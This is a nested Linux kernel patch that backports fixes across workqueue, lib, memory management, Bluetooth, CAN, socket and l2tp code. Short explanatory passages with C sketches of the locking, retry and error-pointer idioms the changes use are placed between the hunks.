++		ret = workqueue_apply_unbound_cpumask(cpumask);
+ 
+-		free_cpumask_var(saved_cpumask);
+ out_unlock:
+ 		apply_wqattrs_unlock();
+ 	}
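Passing the candidate cpumask into apply_wqattrs_prepare() turns the
update into a prepare/commit sequence: every workqueue gets a context
allocated against the new mask first, and wq_unbound_cpumask is only
overwritten once nothing can fail, which removes the saved_cpumask
rollback copy. A sketch of the two-phase shape (all names here are
hypothetical):

	LIST_HEAD(ctxs);
	struct update_ctx *ctx, *n;
	struct object *obj;
	int ret = 0;

	list_for_each_entry(obj, &objects, node) {
		ctx = prepare_update(obj, candidate);	/* may fail; old value untouched */
		if (!ctx) {
			ret = -ENOMEM;
			break;
		}
		list_add_tail(&ctx->list, &ctxs);
	}

	list_for_each_entry_safe(ctx, n, &ctxs, list) {
		if (!ret)
			commit_update(ctx);		/* commit cannot fail */
		cleanup_update(ctx);
	}

	if (!ret)
		publish(candidate);	/* e.g. cpumask_copy() under the attach mutex */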
+diff --git a/lib/bug.c b/lib/bug.c
+index c223a2575b721..e0ff219899902 100644
+--- a/lib/bug.c
++++ b/lib/bug.c
+@@ -47,6 +47,7 @@
+ #include <linux/sched.h>
+ #include <linux/rculist.h>
+ #include <linux/ftrace.h>
++#include <linux/context_tracking.h>
+ 
+ extern struct bug_entry __start___bug_table[], __stop___bug_table[];
+ 
+@@ -153,7 +154,7 @@ struct bug_entry *find_bug(unsigned long bugaddr)
+ 	return module_find_bug(bugaddr);
+ }
+ 
+-enum bug_trap_type report_bug(unsigned long bugaddr, struct pt_regs *regs)
++static enum bug_trap_type __report_bug(unsigned long bugaddr, struct pt_regs *regs)
+ {
+ 	struct bug_entry *bug;
+ 	const char *file;
+@@ -209,6 +210,18 @@ enum bug_trap_type report_bug(unsigned long bugaddr, struct pt_regs *regs)
+ 	return BUG_TRAP_TYPE_BUG;
+ }
+ 
++enum bug_trap_type report_bug(unsigned long bugaddr, struct pt_regs *regs)
++{
++	enum bug_trap_type ret;
++	bool rcu = false;
++
++	rcu = warn_rcu_enter();
++	ret = __report_bug(bugaddr, regs);
++	warn_rcu_exit(rcu);
++
++	return ret;
++}
++
+ static void clear_once_table(struct bug_entry *start, struct bug_entry *end)
+ {
+ 	struct bug_entry *bug;
+diff --git a/lib/errname.c b/lib/errname.c
+index 05cbf731545f0..67739b174a8cc 100644
+--- a/lib/errname.c
++++ b/lib/errname.c
+@@ -21,6 +21,7 @@ static const char *names_0[] = {
+ 	E(EADDRNOTAVAIL),
+ 	E(EADV),
+ 	E(EAFNOSUPPORT),
++	E(EAGAIN), /* EWOULDBLOCK */
+ 	E(EALREADY),
+ 	E(EBADE),
+ 	E(EBADF),
+@@ -31,15 +32,17 @@ static const char *names_0[] = {
+ 	E(EBADSLT),
+ 	E(EBFONT),
+ 	E(EBUSY),
+-#ifdef ECANCELLED
+-	E(ECANCELLED),
+-#endif
++	E(ECANCELED), /* ECANCELLED */
+ 	E(ECHILD),
+ 	E(ECHRNG),
+ 	E(ECOMM),
+ 	E(ECONNABORTED),
++	E(ECONNREFUSED), /* EREFUSED */
+ 	E(ECONNRESET),
++	E(EDEADLK), /* EDEADLOCK */
++#if EDEADLK != EDEADLOCK /* mips, sparc, powerpc */
+ 	E(EDEADLOCK),
++#endif
+ 	E(EDESTADDRREQ),
+ 	E(EDOM),
+ 	E(EDOTDOT),
+@@ -166,14 +169,17 @@ static const char *names_0[] = {
+ 	E(EUSERS),
+ 	E(EXDEV),
+ 	E(EXFULL),
+-
+-	E(ECANCELED), /* ECANCELLED */
+-	E(EAGAIN), /* EWOULDBLOCK */
+-	E(ECONNREFUSED), /* EREFUSED */
+-	E(EDEADLK), /* EDEADLOCK */
+ };
+ #undef E
+ 
++#ifdef EREFUSED /* parisc */
++static_assert(EREFUSED == ECONNREFUSED);
++#endif
++#ifdef ECANCELLED /* parisc */
++static_assert(ECANCELLED == ECANCELED);
++#endif
++static_assert(EAGAIN == EWOULDBLOCK); /* everywhere */
++
+ #define E(err) [err - 512 + BUILD_BUG_ON_ZERO(err < 512 || err > 550)] = "-" #err
+ static const char *names_512[] = {
+ 	E(ERESTARTSYS),
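The reshuffled table keeps exactly one entry per errno value and turns
the architecture-dependent aliases into compile-time checks rather than
duplicate initializers (a duplicate designated initializer would
silently overwrite the earlier one). The idiom:

	/* one canonical entry per value; aliases are asserted, not listed */
	static_assert(EAGAIN == EWOULDBLOCK);	/* holds on every arch */

	#if EDEADLK != EDEADLOCK		/* mips, sparc, powerpc */
	/* distinct values, so each needs its own table entry */
	#endif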
+diff --git a/lib/kobject.c b/lib/kobject.c
+index 985ee1c4f2c60..d20ce15eec2d0 100644
+--- a/lib/kobject.c
++++ b/lib/kobject.c
+@@ -112,7 +112,7 @@ static int get_kobj_path_length(const struct kobject *kobj)
+ 	return length;
+ }
+ 
+-static void fill_kobj_path(const struct kobject *kobj, char *path, int length)
++static int fill_kobj_path(const struct kobject *kobj, char *path, int length)
+ {
+ 	const struct kobject *parent;
+ 
+@@ -121,12 +121,16 @@ static void fill_kobj_path(const struct kobject *kobj, char *path, int length)
+ 		int cur = strlen(kobject_name(parent));
+ 		/* back up enough to print this name with '/' */
+ 		length -= cur;
++		if (length <= 0)
++			return -EINVAL;
+ 		memcpy(path + length, kobject_name(parent), cur);
+ 		*(path + --length) = '/';
+ 	}
+ 
+ 	pr_debug("kobject: '%s' (%p): %s: path = '%s'\n", kobject_name(kobj),
+ 		 kobj, __func__, path);
++
++	return 0;
+ }
+ 
+ /**
+@@ -141,13 +145,17 @@ char *kobject_get_path(const struct kobject *kobj, gfp_t gfp_mask)
+ 	char *path;
+ 	int len;
+ 
++retry:
+ 	len = get_kobj_path_length(kobj);
+ 	if (len == 0)
+ 		return NULL;
+ 	path = kzalloc(len, gfp_mask);
+ 	if (!path)
+ 		return NULL;
+-	fill_kobj_path(kobj, path, len);
++	if (fill_kobj_path(kobj, path, len)) {
++		kfree(path);
++		goto retry;
++	}
+ 
+ 	return path;
+ }
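get_kobj_path_length() and fill_kobj_path() can race with a concurrent
rename, so the fill step now reports truncation instead of writing past
the buffer, and the caller simply re-measures. A minimal sketch of the
measure/fill/retry idiom (measure_path() and fill_path() are
hypothetical):

	char *get_path(const struct object *obj, gfp_t gfp)
	{
		char *buf;
		int len;

	retry:
		len = measure_path(obj);
		buf = kzalloc(len, gfp);
		if (!buf)
			return NULL;
		if (fill_path(obj, buf, len)) {	/* raced with a rename */
			kfree(buf);
			goto retry;
		}
		return buf;
	}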
+diff --git a/lib/mpi/mpicoder.c b/lib/mpi/mpicoder.c
+index 39c4c67310946..3cb6bd148fa9e 100644
+--- a/lib/mpi/mpicoder.c
++++ b/lib/mpi/mpicoder.c
+@@ -504,7 +504,8 @@ MPI mpi_read_raw_from_sgl(struct scatterlist *sgl, unsigned int nbytes)
+ 
+ 	while (sg_miter_next(&miter)) {
+ 		buff = miter.addr;
+-		len = miter.length;
++		len = min_t(unsigned, miter.length, nbytes);
++		nbytes -= len;
+ 
+ 		for (x = 0; x < len; x++) {
+ 			a <<= 8;
+diff --git a/lib/sbitmap.c b/lib/sbitmap.c
+index 1fcede228fa25..888c51235bd3c 100644
+--- a/lib/sbitmap.c
++++ b/lib/sbitmap.c
+@@ -464,13 +464,10 @@ void sbitmap_queue_recalculate_wake_batch(struct sbitmap_queue *sbq,
+ 					    unsigned int users)
+ {
+ 	unsigned int wake_batch;
+-	unsigned int min_batch;
+ 	unsigned int depth = (sbq->sb.depth + users - 1) / users;
+ 
+-	min_batch = sbq->sb.depth >= (4 * SBQ_WAIT_QUEUES) ? 4 : 1;
+-
+ 	wake_batch = clamp_val(depth / SBQ_WAIT_QUEUES,
+-			min_batch, SBQ_WAKE_BATCH);
++			1, SBQ_WAKE_BATCH);
+ 
+ 	WRITE_ONCE(sbq->wake_batch, wake_batch);
+ }
+@@ -521,11 +518,9 @@ unsigned long __sbitmap_queue_get_batch(struct sbitmap_queue *sbq, int nr_tags,
+ 
+ 			get_mask = ((1UL << nr_tags) - 1) << nr;
+ 			val = READ_ONCE(map->word);
+-			do {
+-				if ((val & ~get_mask) != val)
+-					goto next;
+-			} while (!atomic_long_try_cmpxchg(ptr, &val,
+-							  get_mask | val));
++			while (!atomic_long_try_cmpxchg(ptr, &val,
++							  get_mask | val))
++				;
+ 			get_mask = (get_mask & ~val) >> nr;
+ 			if (get_mask) {
+ 				*offset = nr + (index << sb->shift);
+diff --git a/mm/damon/paddr.c b/mm/damon/paddr.c
+index e1a4315c4be6a..402d30b37aba9 100644
+--- a/mm/damon/paddr.c
++++ b/mm/damon/paddr.c
+@@ -219,12 +219,11 @@ static unsigned long damon_pa_pageout(struct damon_region *r)
+ 			put_page(page);
+ 			continue;
+ 		}
+-		if (PageUnevictable(page)) {
++		if (PageUnevictable(page))
+ 			putback_lru_page(page);
+-		} else {
++		else
+ 			list_add(&page->lru, &page_list);
+-			put_page(page);
+-		}
++		put_page(page);
+ 	}
+ 	applied = reclaim_pages(&page_list);
+ 	cond_resched();
+diff --git a/mm/huge_memory.c b/mm/huge_memory.c
+index 1b791b26d72d7..d6651be1aa520 100644
+--- a/mm/huge_memory.c
++++ b/mm/huge_memory.c
+@@ -2837,6 +2837,9 @@ void deferred_split_huge_page(struct page *page)
+ 	if (PageSwapCache(page))
+ 		return;
+ 
++	if (!list_empty(page_deferred_list(page)))
++		return;
++
+ 	spin_lock_irqsave(&ds_queue->split_queue_lock, flags);
+ 	if (list_empty(page_deferred_list(page))) {
+ 		count_vm_event(THP_DEFERRED_SPLIT_PAGE);
+diff --git a/mm/hugetlb_vmemmap.c b/mm/hugetlb_vmemmap.c
+index 45e93a545dd7e..a559037cce00c 100644
+--- a/mm/hugetlb_vmemmap.c
++++ b/mm/hugetlb_vmemmap.c
+@@ -581,7 +581,7 @@ static struct ctl_table hugetlb_vmemmap_sysctls[] = {
+ 	{
+ 		.procname	= "hugetlb_optimize_vmemmap",
+ 		.data		= &vmemmap_optimize_enabled,
+-		.maxlen		= sizeof(int),
++		.maxlen		= sizeof(vmemmap_optimize_enabled),
+ 		.mode		= 0644,
+ 		.proc_handler	= proc_dobool,
+ 	},
+diff --git a/mm/memcontrol.c b/mm/memcontrol.c
+index 73afff8062f9b..2eee092f8f119 100644
+--- a/mm/memcontrol.c
++++ b/mm/memcontrol.c
+@@ -3914,6 +3914,10 @@ static int mem_cgroup_move_charge_write(struct cgroup_subsys_state *css,
+ {
+ 	struct mem_cgroup *memcg = mem_cgroup_from_css(css);
+ 
++	pr_warn_once("Cgroup memory moving (move_charge_at_immigrate) is deprecated. "
++		     "Please report your usecase to linux-mm@kvack.org if you "
++		     "depend on this functionality.\n");
++
+ 	if (val & ~MOVE_MASK)
+ 		return -EINVAL;
+ 
+diff --git a/mm/memory-failure.c b/mm/memory-failure.c
+index c77a9e37e27e0..89361306bfdba 100644
+--- a/mm/memory-failure.c
++++ b/mm/memory-failure.c
+@@ -1034,7 +1034,7 @@ static int me_pagecache_dirty(struct page_state *ps, struct page *p)
+  * cache and swap cache(ie. page is freshly swapped in). So it could be
+  * referenced concurrently by 2 types of PTEs:
+  * normal PTEs and swap PTEs. We try to handle them consistently by calling
+- * try_to_unmap(TTU_IGNORE_HWPOISON) to convert the normal PTEs to swap PTEs,
++ * try_to_unmap(!TTU_HWPOISON) to convert the normal PTEs to swap PTEs,
+  * and then
+  *      - clear dirty bit to prevent IO
+  *      - remove from LRU
+@@ -1415,7 +1415,7 @@ static bool hwpoison_user_mappings(struct page *p, unsigned long pfn,
+ 				  int flags, struct page *hpage)
+ {
+ 	struct folio *folio = page_folio(hpage);
+-	enum ttu_flags ttu = TTU_IGNORE_MLOCK | TTU_SYNC;
++	enum ttu_flags ttu = TTU_IGNORE_MLOCK | TTU_SYNC | TTU_HWPOISON;
+ 	struct address_space *mapping;
+ 	LIST_HEAD(tokill);
+ 	bool unmap_success;
+@@ -1445,7 +1445,7 @@ static bool hwpoison_user_mappings(struct page *p, unsigned long pfn,
+ 
+ 	if (PageSwapCache(p)) {
+ 		pr_err("%#lx: keeping poisoned page in swap cache\n", pfn);
+-		ttu |= TTU_IGNORE_HWPOISON;
++		ttu &= ~TTU_HWPOISON;
+ 	}
+ 
+ 	/*
+@@ -1460,7 +1460,7 @@ static bool hwpoison_user_mappings(struct page *p, unsigned long pfn,
+ 		if (page_mkclean(hpage)) {
+ 			SetPageDirty(hpage);
+ 		} else {
+-			ttu |= TTU_IGNORE_HWPOISON;
++			ttu &= ~TTU_HWPOISON;
+ 			pr_info("%#lx: corrupted page was clean: dropped without side effects\n",
+ 				pfn);
+ 		}
+diff --git a/mm/memory-tiers.c b/mm/memory-tiers.c
+index c734658c62424..e593e56e530b7 100644
+--- a/mm/memory-tiers.c
++++ b/mm/memory-tiers.c
+@@ -211,8 +211,8 @@ static struct memory_tier *find_create_memory_tier(struct memory_dev_type *memty
+ 
+ 	ret = device_register(&new_memtier->dev);
+ 	if (ret) {
+-		list_del(&memtier->list);
+-		put_device(&memtier->dev);
++		list_del(&new_memtier->list);
++		put_device(&new_memtier->dev);
+ 		return ERR_PTR(ret);
+ 	}
+ 	memtier = new_memtier;
+diff --git a/mm/rmap.c b/mm/rmap.c
+index b616870a09be8..3b45d049069e2 100644
+--- a/mm/rmap.c
++++ b/mm/rmap.c
+@@ -1615,7 +1615,7 @@ static bool try_to_unmap_one(struct folio *folio, struct vm_area_struct *vma,
+ 		/* Update high watermark before we lower rss */
+ 		update_hiwater_rss(mm);
+ 
+-		if (PageHWPoison(subpage) && !(flags & TTU_IGNORE_HWPOISON)) {
++		if (PageHWPoison(subpage) && (flags & TTU_HWPOISON)) {
+ 			pteval = swp_entry_to_pte(make_hwpoison_entry(subpage));
+ 			if (folio_test_hugetlb(folio)) {
+ 				hugetlb_count_sub(folio_nr_pages(folio), mm);
+diff --git a/net/bluetooth/hci_conn.c b/net/bluetooth/hci_conn.c
+index acf563fbdfd95..61a34801e61ea 100644
+--- a/net/bluetooth/hci_conn.c
++++ b/net/bluetooth/hci_conn.c
+@@ -1981,16 +1981,14 @@ static void hci_iso_qos_setup(struct hci_dev *hdev, struct hci_conn *conn,
+ 		qos->latency = conn->le_conn_latency;
+ }
+ 
+-static struct hci_conn *hci_bind_bis(struct hci_conn *conn,
+-				     struct bt_iso_qos *qos)
++static void hci_bind_bis(struct hci_conn *conn,
++			 struct bt_iso_qos *qos)
+ {
+ 	/* Update LINK PHYs according to QoS preference */
+ 	conn->le_tx_phy = qos->out.phy;
+ 	conn->le_tx_phy = qos->out.phy;
+ 	conn->iso_qos = *qos;
+ 	conn->state = BT_BOUND;
+-
+-	return conn;
+ }
+ 
+ static int create_big_sync(struct hci_dev *hdev, void *data)
+@@ -2119,11 +2117,7 @@ struct hci_conn *hci_connect_bis(struct hci_dev *hdev, bdaddr_t *dst,
+ 	if (IS_ERR(conn))
+ 		return conn;
+ 
+-	conn = hci_bind_bis(conn, qos);
+-	if (!conn) {
+-		hci_conn_drop(conn);
+-		return ERR_PTR(-ENOMEM);
+-	}
++	hci_bind_bis(conn, qos);
+ 
+ 	/* Add Basic Announcement into Periodic Adv Data if BASE is set */
+ 	if (base_len && base) {
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index a3e0dc6a6e732..adfc3ea06d088 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -2683,14 +2683,6 @@ int l2cap_chan_send(struct l2cap_chan *chan, struct msghdr *msg, size_t len)
+ 		if (IS_ERR(skb))
+ 			return PTR_ERR(skb);
+ 
+-		/* Channel lock is released before requesting new skb and then
+-		 * reacquired thus we need to recheck channel state.
+-		 */
+-		if (chan->state != BT_CONNECTED) {
+-			kfree_skb(skb);
+-			return -ENOTCONN;
+-		}
+-
+ 		l2cap_do_send(chan, skb);
+ 		return len;
+ 	}
+@@ -2735,14 +2727,6 @@ int l2cap_chan_send(struct l2cap_chan *chan, struct msghdr *msg, size_t len)
+ 		if (IS_ERR(skb))
+ 			return PTR_ERR(skb);
+ 
+-		/* Channel lock is released before requesting new skb and then
+-		 * reacquired thus we need to recheck channel state.
+-		 */
+-		if (chan->state != BT_CONNECTED) {
+-			kfree_skb(skb);
+-			return -ENOTCONN;
+-		}
+-
+ 		l2cap_do_send(chan, skb);
+ 		err = len;
+ 		break;
+@@ -2763,14 +2747,6 @@ int l2cap_chan_send(struct l2cap_chan *chan, struct msghdr *msg, size_t len)
+ 		 */
+ 		err = l2cap_segment_sdu(chan, &seg_queue, msg, len);
+ 
+-		/* The channel could have been closed while segmenting,
+-		 * check that it is still connected.
+-		 */
+-		if (chan->state != BT_CONNECTED) {
+-			__skb_queue_purge(&seg_queue);
+-			err = -ENOTCONN;
+-		}
+-
+ 		if (err)
+ 			break;
+ 
+diff --git a/net/bluetooth/l2cap_sock.c b/net/bluetooth/l2cap_sock.c
+index ca8f07f3542b8..eebe256104bc0 100644
+--- a/net/bluetooth/l2cap_sock.c
++++ b/net/bluetooth/l2cap_sock.c
+@@ -1624,6 +1624,14 @@ static struct sk_buff *l2cap_sock_alloc_skb_cb(struct l2cap_chan *chan,
+ 	if (!skb)
+ 		return ERR_PTR(err);
+ 
++	/* Channel lock is released before requesting new skb and then
++	 * reacquired, thus we need to recheck the channel state.
++	 */
++	if (chan->state != BT_CONNECTED) {
++		kfree_skb(skb);
++		return ERR_PTR(-ENOTCONN);
++	}
++
+ 	skb->priority = sk->sk_priority;
+ 
+ 	bt_cb(skb)->l2cap.chan = chan;
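Moving the BT_CONNECTED recheck into the alloc callback covers every
allocation site at once: the channel lock is dropped while the skb
allocation may sleep, so any state observed beforehand must be
re-validated after the lock is reacquired. The pattern in the abstract
(names other than kfree_skb()/IS_ERR() are hypothetical):

	release_lock(chan);
	skb = alloc_sleeping(len);	/* may sleep; state can change */
	acquire_lock(chan);
	if (IS_ERR(skb))
		return PTR_ERR(skb);
	if (chan->state != CONNECTED) {	/* peer may have gone away */
		kfree_skb(skb);
		return -ENOTCONN;
	}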
+diff --git a/net/can/isotp.c b/net/can/isotp.c
+index fc81d77724a13..9bc344851704e 100644
+--- a/net/can/isotp.c
++++ b/net/can/isotp.c
+@@ -1220,6 +1220,9 @@ static int isotp_bind(struct socket *sock, struct sockaddr *uaddr, int len)
+ 	if (len < ISOTP_MIN_NAMELEN)
+ 		return -EINVAL;
+ 
++	if (addr->can_family != AF_CAN)
++		return -EINVAL;
++
+ 	/* sanitize tx CAN identifier */
+ 	if (tx_id & CAN_EFF_FLAG)
+ 		tx_id &= (CAN_EFF_FLAG | CAN_EFF_MASK);
+diff --git a/net/core/scm.c b/net/core/scm.c
+index 5c356f0dee30c..acb7d776fa6ec 100644
+--- a/net/core/scm.c
++++ b/net/core/scm.c
+@@ -229,6 +229,8 @@ int put_cmsg(struct msghdr * msg, int level, int type, int len, void *data)
+ 	if (msg->msg_control_is_user) {
+ 		struct cmsghdr __user *cm = msg->msg_control_user;
+ 
++		check_object_size(data, cmlen - sizeof(*cm), true);
++
+ 		if (!user_write_access_begin(cm, cmlen))
+ 			goto efault;
+ 
+diff --git a/net/core/sock.c b/net/core/sock.c
+index 6f27c24016fee..63680f999bf6d 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -3381,7 +3381,7 @@ void sk_stop_timer_sync(struct sock *sk, struct timer_list *timer)
+ }
+ EXPORT_SYMBOL(sk_stop_timer_sync);
+ 
+-void sock_init_data(struct socket *sock, struct sock *sk)
++void sock_init_data_uid(struct socket *sock, struct sock *sk, kuid_t uid)
+ {
+ 	sk_init_common(sk);
+ 	sk->sk_send_head	=	NULL;
+@@ -3401,11 +3401,10 @@ void sock_init_data(struct socket *sock, struct sock *sk)
+ 		sk->sk_type	=	sock->type;
+ 		RCU_INIT_POINTER(sk->sk_wq, &sock->wq);
+ 		sock->sk	=	sk;
+-		sk->sk_uid	=	SOCK_INODE(sock)->i_uid;
+ 	} else {
+ 		RCU_INIT_POINTER(sk->sk_wq, NULL);
+-		sk->sk_uid	=	make_kuid(sock_net(sk)->user_ns, 0);
+ 	}
++	sk->sk_uid	=	uid;
+ 
+ 	rwlock_init(&sk->sk_callback_lock);
+ 	if (sk->sk_kern_sock)
+@@ -3463,6 +3462,16 @@ void sock_init_data(struct socket *sock, struct sock *sk)
+ 	refcount_set(&sk->sk_refcnt, 1);
+ 	atomic_set(&sk->sk_drops, 0);
+ }
++EXPORT_SYMBOL(sock_init_data_uid);
++
++void sock_init_data(struct socket *sock, struct sock *sk)
++{
++	kuid_t uid = sock ?
++		SOCK_INODE(sock)->i_uid :
++		make_kuid(sock_net(sk)->user_ns, 0);
++
++	sock_init_data_uid(sock, sk, uid);
++}
+ EXPORT_SYMBOL(sock_init_data);
+ 
+ void lock_sock_nested(struct sock *sk, int subclass)
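sock_init_data() keeps its old derivation of sk_uid (the socket inode's
owner, or root in the socket's namespace for kernel sockets), while the
new sock_init_data_uid() lets a caller that already knows the owning
credential pin sk->sk_uid explicitly. A hedged usage sketch (the uid
source shown is illustrative, not taken from this patch):

	kuid_t uid = current_euid();	/* any pre-resolved owner */

	sock_init_data_uid(sock, sk, uid);	/* sets sk->sk_uid = uid */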
+diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c
+index f58d73888638b..7a13dd7f546b6 100644
+--- a/net/ipv4/inet_hashtables.c
++++ b/net/ipv4/inet_hashtables.c
+@@ -1008,17 +1008,7 @@ int __inet_hash_connect(struct inet_timewait_death_row *death_row,
+ 	u32 index;
+ 
+ 	if (port) {
+-		head = &hinfo->bhash[inet_bhashfn(net, port,
+-						  hinfo->bhash_size)];
+-		tb = inet_csk(sk)->icsk_bind_hash;
+-		spin_lock_bh(&head->lock);
+-		if (sk_head(&tb->owners) == sk && !sk->sk_bind_node.next) {
+-			inet_ehash_nolisten(sk, NULL, NULL);
+-			spin_unlock_bh(&head->lock);
+-			return 0;
+-		}
+-		spin_unlock(&head->lock);
+-		/* No definite answer... Walk to established hash table */
++		local_bh_disable();
+ 		ret = check_established(death_row, sk, port, NULL);
+ 		local_bh_enable();
+ 		return ret;
+diff --git a/net/l2tp/l2tp_ppp.c b/net/l2tp/l2tp_ppp.c
+index db2e584c625e5..f011af6601c9c 100644
+--- a/net/l2tp/l2tp_ppp.c
++++ b/net/l2tp/l2tp_ppp.c
+@@ -650,54 +650,22 @@ static int pppol2tp_tunnel_mtu(const struct l2tp_tunnel *tunnel)
+ 	return mtu - PPPOL2TP_HEADER_OVERHEAD;
+ }
+ 
+-/* connect() handler. Attach a PPPoX socket to a tunnel UDP socket
+- */
+-static int pppol2tp_connect(struct socket *sock, struct sockaddr *uservaddr,
+-			    int sockaddr_len, int flags)
++static struct l2tp_tunnel *pppol2tp_tunnel_get(struct net *net,
++					       const struct l2tp_connect_info *info,
++					       bool *new_tunnel)
+ {
+-	struct sock *sk = sock->sk;
+-	struct pppox_sock *po = pppox_sk(sk);
+-	struct l2tp_session *session = NULL;
+-	struct l2tp_connect_info info;
+ 	struct l2tp_tunnel *tunnel;
+-	struct pppol2tp_session *ps;
+-	struct l2tp_session_cfg cfg = { 0, };
+-	bool drop_refcnt = false;
+-	bool drop_tunnel = false;
+-	bool new_session = false;
+-	bool new_tunnel = false;
+ 	int error;
+ 
+-	error = pppol2tp_sockaddr_get_info(uservaddr, sockaddr_len, &info);
+-	if (error < 0)
+-		return error;
++	*new_tunnel = false;
+ 
+-	lock_sock(sk);
+-
+-	/* Check for already bound sockets */
+-	error = -EBUSY;
+-	if (sk->sk_state & PPPOX_CONNECTED)
+-		goto end;
+-
+-	/* We don't supporting rebinding anyway */
+-	error = -EALREADY;
+-	if (sk->sk_user_data)
+-		goto end; /* socket is already attached */
+-
+-	/* Don't bind if tunnel_id is 0 */
+-	error = -EINVAL;
+-	if (!info.tunnel_id)
+-		goto end;
+-
+-	tunnel = l2tp_tunnel_get(sock_net(sk), info.tunnel_id);
+-	if (tunnel)
+-		drop_tunnel = true;
++	tunnel = l2tp_tunnel_get(net, info->tunnel_id);
+ 
+ 	/* Special case: create tunnel context if session_id and
+ 	 * peer_session_id is 0. Otherwise look up tunnel using supplied
+ 	 * tunnel id.
+ 	 */
+-	if (!info.session_id && !info.peer_session_id) {
++	if (!info->session_id && !info->peer_session_id) {
+ 		if (!tunnel) {
+ 			struct l2tp_tunnel_cfg tcfg = {
+ 				.encap = L2TP_ENCAPTYPE_UDP,
+@@ -706,40 +674,82 @@ static int pppol2tp_connect(struct socket *sock, struct sockaddr *uservaddr,
+ 			/* Prevent l2tp_tunnel_register() from trying to set up
+ 			 * a kernel socket.
+ 			 */
+-			if (info.fd < 0) {
+-				error = -EBADF;
+-				goto end;
+-			}
++			if (info->fd < 0)
++				return ERR_PTR(-EBADF);
+ 
+-			error = l2tp_tunnel_create(info.fd,
+-						   info.version,
+-						   info.tunnel_id,
+-						   info.peer_tunnel_id, &tcfg,
++			error = l2tp_tunnel_create(info->fd,
++						   info->version,
++						   info->tunnel_id,
++						   info->peer_tunnel_id, &tcfg,
+ 						   &tunnel);
+ 			if (error < 0)
+-				goto end;
++				return ERR_PTR(error);
+ 
+ 			l2tp_tunnel_inc_refcount(tunnel);
+-			error = l2tp_tunnel_register(tunnel, sock_net(sk),
+-						     &tcfg);
++			error = l2tp_tunnel_register(tunnel, net, &tcfg);
+ 			if (error < 0) {
+ 				kfree(tunnel);
+-				goto end;
++				return ERR_PTR(error);
+ 			}
+-			drop_tunnel = true;
+-			new_tunnel = true;
++
++			*new_tunnel = true;
+ 		}
+ 	} else {
+ 		/* Error if we can't find the tunnel */
+-		error = -ENOENT;
+ 		if (!tunnel)
+-			goto end;
++			return ERR_PTR(-ENOENT);
+ 
+ 		/* Error if socket is not prepped */
+-		if (!tunnel->sock)
+-			goto end;
++		if (!tunnel->sock) {
++			l2tp_tunnel_dec_refcount(tunnel);
++			return ERR_PTR(-ENOENT);
++		}
+ 	}
+ 
++	return tunnel;
++}
++
++/* connect() handler. Attach a PPPoX socket to a tunnel UDP socket
++ */
++static int pppol2tp_connect(struct socket *sock, struct sockaddr *uservaddr,
++			    int sockaddr_len, int flags)
++{
++	struct sock *sk = sock->sk;
++	struct pppox_sock *po = pppox_sk(sk);
++	struct l2tp_session *session = NULL;
++	struct l2tp_connect_info info;
++	struct l2tp_tunnel *tunnel;
++	struct pppol2tp_session *ps;
++	struct l2tp_session_cfg cfg = { 0, };
++	bool drop_refcnt = false;
++	bool new_session = false;
++	bool new_tunnel = false;
++	int error;
++
++	error = pppol2tp_sockaddr_get_info(uservaddr, sockaddr_len, &info);
++	if (error < 0)
++		return error;
++
++	/* Don't bind if tunnel_id is 0 */
++	if (!info.tunnel_id)
++		return -EINVAL;
++
++	tunnel = pppol2tp_tunnel_get(sock_net(sk), &info, &new_tunnel);
++	if (IS_ERR(tunnel))
++		return PTR_ERR(tunnel);
++
++	lock_sock(sk);
++
++	/* Check for already bound sockets */
++	error = -EBUSY;
++	if (sk->sk_state & PPPOX_CONNECTED)
++		goto end;
++
++	/* We don't support rebinding anyway */
++	error = -EALREADY;
++	if (sk->sk_user_data)
++		goto end; /* socket is already attached */
++
+ 	if (tunnel->peer_tunnel_id == 0)
+ 		tunnel->peer_tunnel_id = info.peer_tunnel_id;
+ 
+@@ -840,8 +850,7 @@ end:
+ 	}
+ 	if (drop_refcnt)
+ 		l2tp_session_dec_refcount(session);
+-	if (drop_tunnel)
+-		l2tp_tunnel_dec_refcount(tunnel);
++	l2tp_tunnel_dec_refcount(tunnel);
+ 	release_sock(sk);
+ 
+ 	return error;
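
The refactor above moves the tunnel lookup and creation into a pppol2tp_tunnel_get() helper that reports failure through the kernel's ERR_PTR encoding instead of an error variable plus goto labels, which is what lets pppol2tp_connect() take the socket lock only after the tunnel is resolved. A minimal userspace sketch of the ERR_PTR idiom (the real macros live in include/linux/err.h and are re-implemented here purely for illustration):

	#include <errno.h>
	#include <stdio.h>
	#include <stdlib.h>

	/* Userspace re-implementation of the <linux/err.h> idiom: negative
	 * errno values are folded into the top of the pointer range, so one
	 * return value carries either a valid pointer or an error code.
	 */
	#define MAX_ERRNO	4095

	static inline void *ERR_PTR(long error) { return (void *)error; }
	static inline long PTR_ERR(const void *ptr) { return (long)ptr; }
	static inline int IS_ERR(const void *ptr)
	{
		return (unsigned long)ptr >= (unsigned long)-MAX_ERRNO;
	}

	struct tunnel { int id; };

	/* Never returns NULL, so callers need only the IS_ERR() check. */
	static struct tunnel *tunnel_get(int id)
	{
		struct tunnel *t;

		if (id == 0)
			return ERR_PTR(-EINVAL);	/* "don't bind tunnel_id 0" */
		t = malloc(sizeof(*t));
		if (!t)
			return ERR_PTR(-ENOMEM);
		t->id = id;
		return t;
	}

	int main(void)
	{
		struct tunnel *t = tunnel_get(0);

		if (IS_ERR(t))
			printf("lookup failed: %ld\n", PTR_ERR(t));
		t = tunnel_get(42);
		if (!IS_ERR(t)) {
			printf("got tunnel %d\n", t->id);
			free(t);
		}
		return 0;
	}
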
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index 672eff6f5d328..d611e15301839 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -4622,6 +4622,20 @@ unlock:
+ 	sdata_unlock(sdata);
+ }
+ 
++void ieee80211_color_collision_detection_work(struct work_struct *work)
++{
++	struct delayed_work *delayed_work = to_delayed_work(work);
++	struct ieee80211_link_data *link =
++		container_of(delayed_work, struct ieee80211_link_data,
++			     color_collision_detect_work);
++	struct ieee80211_sub_if_data *sdata = link->sdata;
++
++	sdata_lock(sdata);
++	cfg80211_obss_color_collision_notify(sdata->dev, link->color_bitmap,
++					     GFP_KERNEL);
++	sdata_unlock(sdata);
++}
++
